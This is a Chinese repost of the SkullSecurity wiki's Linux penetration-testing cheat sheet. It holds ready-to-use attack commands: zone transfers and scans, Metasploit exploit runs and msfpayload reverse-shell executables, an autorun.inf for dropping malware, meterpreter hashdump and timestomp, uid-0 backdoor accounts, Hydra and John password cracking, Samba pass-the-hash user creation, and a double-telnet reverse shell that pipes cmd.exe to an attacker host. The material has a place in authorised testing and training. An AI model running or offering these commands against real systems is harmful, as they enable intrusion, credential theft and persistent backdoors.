码迷,mamicode.com
首页 > 系统相关 > 详细

skullsecurity作者常用的一些linux命令

时间:2018-02-05 10:41:28      阅读:245      评论:0      收藏:0      [点我收藏+]

标签:tle   att   service   modules   lower   rdf   man   ade   lookup   

https://wiki.skullsecurity.org/index.php?title=Linux_Commands

whois

$ whois [-h whois_server] name

nslookup

$ nslookup <target>

dig

  • Types of record: NS, A, HINFO, MX, TXT, CNAME, SOA, RP, PTR, SRV

$ dig [@server] <name> [type]
  • Zone transfer

$ dig [@server] <domain> -t AXFR
  • Iterative zone transfer

$ dig [@server] <domain> -t IXFR=<N>

BiLE.pl

$ ./BiLE <target> <result_file>
$ ./BiLE-weigh.pl <site_of_interest> <BiLE_output.mine>
$ ./tld-expand.pl
$ ./vet-IPrange.pl
$ ./qtrace.pl

snmpwalk

Dump the ARP table of an snmp server at HOST

$ snmpwalk -v 2c -c <community> <server> ip.ipNetToMediaTable.ipNetToMediaEntry.ipNetToMediaPhysAddress > arptable.dump

Scanning

tcpdump

Parameters

  • -n -- use numbers

  • -i <interface>

  • -v -- be verbose

  • -r <file>/-w <file> -- read from/write to file

  • -x -- print hex

  • -A -- print ASCII

  • -X -- print hex and ASCII

  • -s <snaplen> -- length to capture (-s0 for all data)

Filter string

  • Protocol

    • ether, ip, ip6, arp, rarp, tcp, udp

  • Type

    • host <host>

    • net <network>

    • port <portnum>

    • portrange <start-end>

  • Direction

    • src

    • dst

  • Logic

    • and

    • or

  • Show TCP against target 10.10.10.10 in ASCII

    tcpdump [-i tap0] -n -A tcp and dst 10.10.10.10
    • Show all UDP from 10.10.10.10

    tcpdump [-i tap0] -n udp and src 10.10.10.10
    • Show all TCP port 80 packets going to or from host 10.10.10.10

    tcpdump [-i tap0] -n tcp and port 80 and host 10.10.10.10

    hping3

    TCP Flags

    • --syn, --fin, --rst, --push, --ack, --urg

    Target selection

    • --rand-dest

    • --interface <int>

    Source selection

    • --spoof <hostname>

    • --rand-source

    Port selection

    • --destport <port>

    • --destport +<port> -- increment by one for each packet received

    • --destport ++<port> -- increment by one for each packet sent

    • --scan <portrange>

    • --baseport <port>

    • --keep -- don't increment the source port

    Speed options

    • --fast, --faster, --flood

    • --interval <N> -- interval in seconds

    • --interval u<N> -- interval in microseconds

    Other options

    • --count <N>

    • --beep

    • --file <filename>

    • --data <N>

    traceroute

    Parameters

    • -f <N> -- Initial TTL

    • -g <hostlist> -- Loose source route

    • -I -- use ICMP Echo instead of UDP

    • -m <N> -- maximum number of hops (default 30)

    • -n -- numeric

    • -p <baseport> -- set the base UDP port

    • -w <N> -- wait N seconds (default 5)

    Layer Four Traceroute (lft)

    http://pwhois.org/lft/index.who

    Options

    • -u -- use UDP

    • -p -- use ICMP echo

    • -d <port> -- destination port (default 80)

    • -s <port> -- source port

    • -L <N> -- length (including layer 3/4 header)

    • -A -- look up AS number

    • -P -- traceroute via tcp

    nmap

    Pinging

    • -PN -- don't ping

    • -PB -- default, ICMP Echo + TCP to port 80

    • -PE -- ICMP Echo request

    • -PS[portlist] -- TCP SYN

    • -PP -- ICMP Timestamp request

    • -PM -- ICMP Address Mask request

    • -PR -- default on subnet, use ARP to identify hosts

    Scanning

    • -sT -- TCP Connect scan

    • -sS -- SYN scan

    • -sA -- ACK scan

    • -sF -- FIN scan

    • -sN -- Null scan

    • -sX -- Xmas Tree scan

    • -sM -- Maimon scan

    • --scanflags specify your own flags

    • -sU -- UDP scan

    Fingerprinting

    • -O -- OS fingerprint

    • -sV -- Version scan

    Scripts

    • -sC -- run all scripts

    • --script=<category,dir,src,etc&/gt;

    • --script-trace

    Timing

    • --paranoid, --sneaky, --polite, --normal, --aggressive, --insane

    • --host_timeout, --max_rtt_timeout, --min-rtt-timeout, --initial_rtt_timeout, --max-parallelism, --scan_delay

    Other options

    • -p<ports>

    • -F -- fast (checks only ports in nmap-services)

    • --packet-trace

    • --traceroute

    • --badsum

    THC amap

    Options

    • -q -- quiet (omit closed ports)

    • -v -- verbose

    • -b -- print banners

    Example:

    amap -bqv 10.10.10.10 1-50

    Enumerating users

    Commands

    $ cat /etc/passwd
    $ finger
    $ who
    $ w

    Remotely:

    $ finger @<target>

    Exploitation

    netcat

    Options

    • -l -- listen mode

    • -L -- listen harder (Windows only)

    • -u -- UDP mode

    • -p -- local port (in listen mode, the port to listen on)

    • -e -- program to execute

    • -n -- don't resolve names

    • -z -- don't send any data

    • -w<N> -- timeout for connects

    • -v/-vv -- be verbose

    Scanning

    echo "" | nc -v -n -w1 <target> <port-range>

    Setting up a relay

    mknod backpipe p
    nc -l -p <allowed_port> < backpipe | nc <host> <port> > backpipe

    Relaying port 22 to the local system

    mknod backpipe p
    nc -l -p <allowed_port> < backpipe | nc localhost 22 > backpipe

    Finding SetUID/SetGID programs

    find / -type f \( -perm -4000 -o -perm -2000 \) -print
    find /bin -type f \( -perm -4000 -o -perm -2000 \) -print
    find /sbin -type f \( -perm -4000 -o -perm -2000 \) -print
    find /usr/bin -type f \( -perm -4000 -o -perm -2000 \) -print
    find /usr/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
    find /usr/local/bin -type f \( -perm -4000 -o -perm -2000 \) -print
    find /usr/local/sbin -type f \( -perm -4000 -o -perm -2000 \) -print
    for i in `locate -r "bin$"`; do find $i -type f \( -perm -4000 -o -perm -2000 \) -print; done

    Metasploit

    Running an exploit

    msf> show exploits
    msf> use exploit/windows/smf/ms05_039_php
    msf> show payloads
    msf> set PAYLOAD windows/shell/bind_tcp
    msf> show options
    msf> set RHOST 10.10.10.10
    msf> exploit

    Interacting with sessions

    msf> sessions -l
    msf> sessions -i <N>

    Creating a malicious VBScript

    $ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> V
    $ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y V

    Creating a malicious Exe

    $ msfpayload windows/meterpreter/reverse_tcp LHOST=<lhost> X
    $ msfpayload windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y X

    Example autorun.inf file to run a malicious exe (goes with Metasploit)

    [autorun]
    open=example.exe
    icon=example.exe

    Metasploit listener

    $ msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=<lhost> E
    $ msfcli multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=<lhost> DisableCourtesyShell=y E

    Meterpreter

    Filesystem commands

    > cd
    > lcd 
    > pwd / getwd
    > ls
    > cat
    > download / upload
    > mkdir / rmdir
    > edit
    > getpid
    > getuid
    > ps
    > kill
    > execute
    > migrate
    > ipconfig
    > portfwd
    > route
    > idletime
    > uictl <enable/disable> <keyboard/mouse>

    Modules

    > use <modulename>
    > use priv
    > hashdump
    > timestomp

    Creating a user

    Adding an ordinary user

    useradd <name>

    Adding a root user (note: a non-uid-0 account may be required to log in)

    useradd -o -u 0 <name>

    telnet

    Checking for inetd/xinetd

    ps aux | grep inetd

    Adding telnet to /etc/inetd

    telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd

    Adding telnet to xinetd

    • Steal the file from a service that's running (files are in /etc/xinetd.d)

    • Change server to "/usr/sbin/in.telnetd"

    Restarting inetd/xinetd (the "kill" command with the PID can also be used)

    killall -HUP inetd
    killall -HUP xinetd

    sshd

    File should be in /etc/rc*. Ways to enable:

    chkconfig sshd on
    service sshd start
    /etc/init.d/sshd start

    Passwords

    Dictionaries

    Creating a dictionary

    cat wordlist.txt | sort | uniq > dictionary.txt

    Scraping a Web site

    mkdir /tmp/source
    cd /tmp/source
    wget -r -l <N> <target>
    cd ..
    grep -h -r "" source | tr '[:space:]' '\n' | grep -v '<' | sort | uniq > wordlist.lst

    Or, just use my dictionaries

    Account lockout

    grep tally /etc/pam.d/*
    grep tally /etc/pam.conf

    pw-inspector

    Options

    • -i -- input file

    • -o -- output file

    • -m <N> -- minimum length

    • -M <N> -- maximum length

    • -c <N> -- the number of criteria

      • -l -- lower case

      • -u -- upper case

      • -n -- numbers

      • -p -- printable characters (lower/upper/num)

      • -s -- special characters (all others)

    Example

    cat /tmp/password.list | pw-inspector -m 6 -n -u -l -c 2

    Hydra

    Options

    • -l <username>/-L <userfile> -- Login name/file

    • -p <password>/-P <passfile> -- Password/file

    • -e <n|s|ns> -- extended checks (n = null, s = same as username)

    • -t <N> -- thread count

    hydra <host> <protocol> <-l <username>|-L <userfile>> <-p <password>|-P <passfile>> [-e <n|s|ns>] [-t <threads>]

    smb password

    hydra <host> smb -l george -P ./list.lst -e ns

    ssh password

    hydra <host> ssh2 -l george -P ./list.lst -e ns

    John

    Show cracked passwords

    john --show <passwordfile>

    Speed test

    john --test

    Running against a password file

    john <passwordfile>

    Specifying type type

    john --format=<format> <passwordfile>
    john --format=nt /tmp/pwdump

    Combining passwd/shadow

    unshadow <passwdfile> <shadowfile> > combined.txt
    john combined.txt

    Modified Samba

    Loading the hash

    export SMBHASH="<LANMAN>:<NT>"
    echo $SMBHASH

    Mounting a drive

    ./smbmount //<target>/<share> <mountpoint> -o username=<username>
    ./smbmount //10.10.10.10/c$ /mnt/target -o username=administrator

    Adding a user

    ./net user ADD <username> <password> -I <target> -U <admin_username>
    ./net rpc group ADDMEM administrators <username> -I <target> -U <admin_username>

    Web

    nikto.pl

    Scanning

    nikto.pl -h <host>

    Updating

    nikto.pl -update

    Single check

    nikto.pl -Single

    Fancy tricks

    Double-telnet

    On the attacker machine

    nc -l -p 4444
    nc -l -p 5555

    On the victim machine

    telnet <attacker> 4444 | cmd.exe | telnet <attacker> 5555


    skullsecurity作者常用的一些linux命令

    标签:tle   att   service   modules   lower   rdf   man   ade   lookup   

    原文地址:http://blog.51cto.com/simeon/2068854

    (0)
    (0)
       
    举报
    评论 一句话评论(0
    登录后才能评论!
    © 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
    迷上了代码!